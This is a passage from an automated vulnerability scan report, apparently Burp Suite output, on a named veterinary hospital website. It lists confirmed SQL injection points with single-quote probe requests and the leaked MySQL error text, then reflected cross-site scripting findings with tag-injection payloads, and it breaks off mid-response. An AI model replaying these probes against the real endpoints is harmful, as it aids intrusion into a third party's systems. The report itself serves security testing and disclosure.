Content-Length: 9673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='marshfield''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''                        
                        limit 1' at line 31

Request 2

GET /marshfield''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new-york-veterinary-hospital'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2286
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
n ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='new-york-veterinary-hospital''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''new-york-veterinary-hospital''                        
                        limit 1' at line 31

Request 2

GET /new-york-veterinary-hospital''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/more/boarding.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='plymouth''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''                        
                        limit 1' at line 31

Request 2

GET /plymouth''/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Length: 7909
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema=E13' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''E13'' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

Request 2

GET /tools/markers_sema.php?sema=E13'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

2. Cross-site scripting (reflected)
There are 138 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /becker/markers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfec"><a>30055149e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becker/markers.php6dfec"><a>30055149e9d?lat=40.7388648&lng=-73.9831733&ffe HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator.
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:48:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="markers6dfec"><a>30055149e9d">
...[SNIP]...

2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54666"><a>31d8f105f44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hanson/appt.html54666"><a>31d8f105f44 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
